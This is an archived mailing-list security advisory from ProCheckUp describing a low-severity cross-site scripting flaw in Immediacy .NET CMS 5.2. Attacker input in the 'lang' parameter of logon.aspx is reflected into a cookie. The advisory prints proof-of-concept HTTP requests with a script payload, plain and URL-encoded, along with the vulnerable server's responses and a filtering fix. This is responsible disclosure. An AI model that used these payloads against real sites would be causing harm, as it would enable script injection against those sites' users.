Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] Immediacy .NET CMS possibly vulnerable to Cross Site Scripti

from [ProCheckUp Research] Network Security [Permanent Link]
Subject: [VulnWatch] Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie
Date: Wed, 08 Nov 2006 11:40:10 +0000 
PR05-06: Immediacy .NET CMS possibly vulnerable to Cross Site Scripting
through a malformed cookie

This advisory has been published following consultation with UK NISCC
<http://www.niscc.gov.uk/>

Date found: 2005-02-27

Vulnerable: Immediacy .NET CMS 5.2

Severity: Low

Author: Gemma Hughes [gemma.hughes at procheckup.com]

Vendor Status: CVE Candidate not Assigned

Description:

Immediacy CMS appears to allow Cross Site Scripting attacks via a
malformed 'Set-Cookie:' header. This issue concerns the 'logon.aspx'
program and 'lang' variable. This could allow attackers to cause the
execution of malicious script code within the context of the vulnerable
site.

Note: web browser-specific CRLF injection techniques may be required in
order to exploit this issue.


Information:

REQUEST:

GET
/logon.aspx?lang=<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
HTTP/1.1
Host: example.host.co.uk
Cookie: ASINFO=...; ASP.NET_SessionId=...; CNBOOK=...;
ASPSESSIONIDSCDAQTST=...
Referer: http://example.host.co.uk:80/environ.pl
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461;
.NET CLR 1.0.3705)
Connection: close


RESULT:

HTTP/1.1 302 Found
Connection: close
Date: Sun, 27 Feb 2005 19:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /generalerror.aspx?aspxerrorpath=/logon.aspx
Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>;
expires=Mon, 27-Jun-2005 18:18:31 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 161
Set-Cookie: ASINFO=...
Set-Cookie: CNBOOK=...
Cache-Control: proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a
href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2>
</body></html>



It is also possible to submit the request using byte-encoded characters:

REQUEST:

GET
/logon.aspx?lang=%3CSCRIPT%3Ealert%28'Can%20Cross%20Site%20Attack'%29%3C%2FSCRIPT%3E&page=272& 


HTTP/1.1
Host: example.host.co.uk
Cookie: ASINFO=...; lang=cy; ASP.NET_SessionId=...; CNBOOK=ClearNet;
ASPSESSIONIDSCDAQTST=...
Referer: http://example.host.co.uk:80/default.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461;
.NET CLR 1.0.3705)
Connection: close

RESULTS:

HTTP/1.1 302 Found
Connection: close
Date: Sun, 27 Feb 2005 19:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /generalerror.aspx?aspxerrorpath=/logon.aspx
Set-Cookie: lang=<SCRIPT>alert('Can Cross Site Attack')</SCRIPT>;
expires=Mon, 27-Jun-2005 18:29:27 GMT; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 161
Set-Cookie: ASINFO=...
Set-Cookie: CNBOOK=ClearNet;path=/;domain=.host.co.uk;expires=Fri, 31
Dec 2010 00:00:01 GMT
Cache-Control: proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a
href='/generalerror.aspx?aspxerrorpath=/logon.aspx'>here</a>.</h2>
</body></html>


Consequences:

An attacker might cause the execution of malicious script code in the
client (web browser) within the context of the site running the
vulnerable version of Immediacy .NET CMS.

Fix: Contact vendor. Ensure all input is filtered, especially the '<'
and '>' characters.

References:

http://www.procheckup.com/Vulner_PR0506.php
http://www.immediacy.co.uk/

Legal:

Copyright 2005 ProCheckUp Ltd.  All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not
changed or edited in any way, is attributed to ProCheckUp, and provided
such reproduction and/or distribution is performed for non-commercial
purposes. Any other use of this
information is prohibited.  ProCheckUp is not liable for any misuse of
this information by any third party.


[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] Immediacy .NET CMS possibly vulnerable to Cross Site Scripting through a malformed cookie, ProCheckUp Research <=
Previous by Date:  [VulnWatch] Cross Site Scripting (XSS) Vulnerability in IBM WebSphere Application Server, ProCheckUp Research
Next by Date:  [Full-disclosure] iDefense Security Advisory 11.09.06: Citrix Presentation Server 4.0 IMA Service Invalid Name Length DoS Vulnerability, iDefense Labs
Previous by Thread:  [VulnWatch] Cross Site Scripting (XSS) Vulnerability in IBM WebSphere Application Server, ProCheckUp Research
Next by Thread:  [Full-disclosure] iDefense Security Advisory 11.09.06: Citrix Presentation Server 4.0 IMA Service Invalid Name Length DoS Vulnerability, iDefense Labs
Indexes:  [Date] [Thread] [Top] [All Lists]